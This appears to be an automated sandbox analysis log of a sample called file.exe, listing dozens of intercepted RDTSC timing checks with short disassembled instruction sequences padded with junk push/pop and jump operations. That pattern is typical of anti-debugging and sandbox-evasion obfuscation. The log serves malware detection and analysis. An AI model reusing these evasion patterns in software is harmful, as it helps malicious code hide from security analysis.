                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF22C second address: 13BF232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF949 second address: 13BF94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF94F second address: 13BF985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, 04F42100h 0x0000000e lea eax, dword ptr [ebp+124804AAh] 0x00000014 xor ecx, 700C50C4h 0x0000001a nop 0x0000001b pushad 0x0000001c jmp 00007F65A450259Ah 0x00000021 ja 00007F65A4502598h 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF985 second address: 13BF989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF989 second address: 13BF98F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF98F second address: 13A6750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65A4C18FA2h 0x00000008 jmp 00007F65A4C18FA7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 xor edi, dword ptr [ebp+122D2CCCh] 0x00000017 lea eax, dword ptr [ebp+12480466h] 0x0000001d mov ecx, dword ptr [ebp+122D29D4h] 0x00000023 nop 0x00000024 jmp 00007F65A4C18FA6h 0x00000029 push eax 0x0000002a js 00007F65A4C18F9Ch 0x00000030 pushad 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 push esi 0x00000034 pop esi 0x00000035 popad 0x00000036 nop 0x00000037 jno 00007F65A4C18F96h 0x0000003d push ebx 0x0000003e mov edi, dword ptr [ebp+122DBA77h] 0x00000044 pop edx 0x00000045 call dword ptr [ebp+122D1A5Ah] 0x0000004b pushad 0x0000004c jl 00007F65A4C18F9Ah 0x00000052 pushad 0x00000053 popad 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 jl 00007F65A4C18F9Ch 0x0000005c jng 00007F65A4C18F96h 0x00000062 jne 00007F65A4C18FB3h 0x00000068 js 00007F65A4C18F9Ch 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407652 second address: 1407658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407658 second address: 140765C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140765C second address: 1407662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407662 second address: 1407668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407668 second address: 140767A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F65A450259Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140AC8F second address: 140AC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140A502 second address: 140A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F65A45025A2h 0x0000000c popad 0x0000000d jng 00007F65A45025BBh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140A525 second address: 140A52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140A52B second address: 140A531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140A847 second address: 140A851 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65A4C18FA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140A851 second address: 140A857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E68B second address: 140E6A1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65A4C18FA1h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412304 second address: 141230A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141230A second address: 141233C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA1h 0x00000007 jmp 00007F65A4C18F9Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65A4C18FA0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411AD8 second address: 1411AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411AE3 second address: 1411AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411AE7 second address: 1411B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Fh 0x00000007 jp 00007F65A4502596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1411D4E second address: 1411D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1412060 second address: 1412084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65A4502596h 0x0000000a pop edx 0x0000000b jnl 00007F65A450259Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65A450259Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416F8C second address: 1416FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A4C18FA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416FAB second address: 1416FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141623B second address: 141624E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F65A4C18F9Ch 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163AC second address: 14163C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A450259Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007F65A4502596h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163C7 second address: 14163E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18FA4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163E0 second address: 14163E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163E6 second address: 14163FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18FA0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14163FA second address: 14163FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141651E second address: 141652C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1416689 second address: 141668F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141668F second address: 14166A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18FA1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14166A4 second address: 14166A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14166A8 second address: 14166AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14167F9 second address: 141682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F65A45025A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F65A45025A3h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141682A second address: 1416852 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4C18F98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F65A4C18FA8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B094 second address: 141B0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F65A45025A8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F65A45025A0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B0B1 second address: 141B0B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B35C second address: 141B360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B360 second address: 141B364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B364 second address: 141B385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65A45025A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B385 second address: 141B389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B389 second address: 141B3CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F65A45025A4h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F65A45025AFh 0x0000001b jmp 00007F65A45025A7h 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B3CB second address: 141B3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B3D1 second address: 141B3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B547 second address: 141B54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B54E second address: 141B557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF3E2 second address: 13BF3F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A4C18F9Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF3F5 second address: 13BF402 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF402 second address: 13BF44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F65A4C18F96h 0x0000000a popad 0x0000000b jc 00007F65A4C18F98h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 and edx, 495F67D6h 0x0000001b mov ecx, 715B80A2h 0x00000020 mov ebx, dword ptr [ebp+124804A5h] 0x00000026 mov dx, di 0x00000029 add eax, ebx 0x0000002b nop 0x0000002c jmp 00007F65A4C18F9Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F65A4C18F9Dh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF44B second address: 13BF47E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edi, 2A01B043h 0x00000010 push 00000004h 0x00000012 xor dword ptr [ebp+122D1873h], edx 0x00000018 mov dword ptr [ebp+122D358Ah], eax 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F65A450259Dh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF47E second address: 13BF483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF483 second address: 13BF489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF489 second address: 13BF496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423AE7 second address: 1423AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423AEB second address: 1423AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421AB3 second address: 1421AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421AB7 second address: 1421ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421C14 second address: 1421C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422063 second address: 142206D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142206D second address: 14220B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65A450259Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007F65A45025A9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 jmp 00007F65A45025A2h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14220B0 second address: 14220B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422388 second address: 142238E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142238E second address: 1422392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142265E second address: 1422684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F65A45025A3h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F65A4502596h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142295E second address: 1422967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422967 second address: 142296B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EE5 second address: 1422EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EED second address: 1422EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EF3 second address: 1422EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1422EF7 second address: 1422EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14234C6 second address: 14234D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F65A4C18F96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1423769 second address: 142377F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A450259Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007F65A4502596h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14283D7 second address: 1428405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA3h 0x00000007 jbe 00007F65A4C18F96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F65A4C18F9Fh 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428405 second address: 142840A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14280F4 second address: 14280FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14280FC second address: 1428106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428106 second address: 1428144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65A4C18FA7h 0x00000011 push edi 0x00000012 jbe 00007F65A4C18F96h 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428144 second address: 142814A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432653 second address: 1432672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432672 second address: 1432678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143278F second address: 1432793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432793 second address: 1432797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432797 second address: 14327B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a jl 00007F65A4C18F98h 0x00000010 pushad 0x00000011 jc 00007F65A4C18F96h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14330F0 second address: 143312F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65A45025A8h 0x00000008 jng 00007F65A4502596h 0x0000000e jmp 00007F65A450259Ch 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007F65A45025B1h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433559 second address: 143355D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143355D second address: 1433563 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D21 second address: 1433D27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D27 second address: 1433D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F65A450259Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D40 second address: 1433D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433D44 second address: 1433D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143448E second address: 1434496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1434496 second address: 143449E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143449E second address: 14344B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F65A4C18F9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14344B4 second address: 14344BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65A4502596h 0x0000000a rdtsc
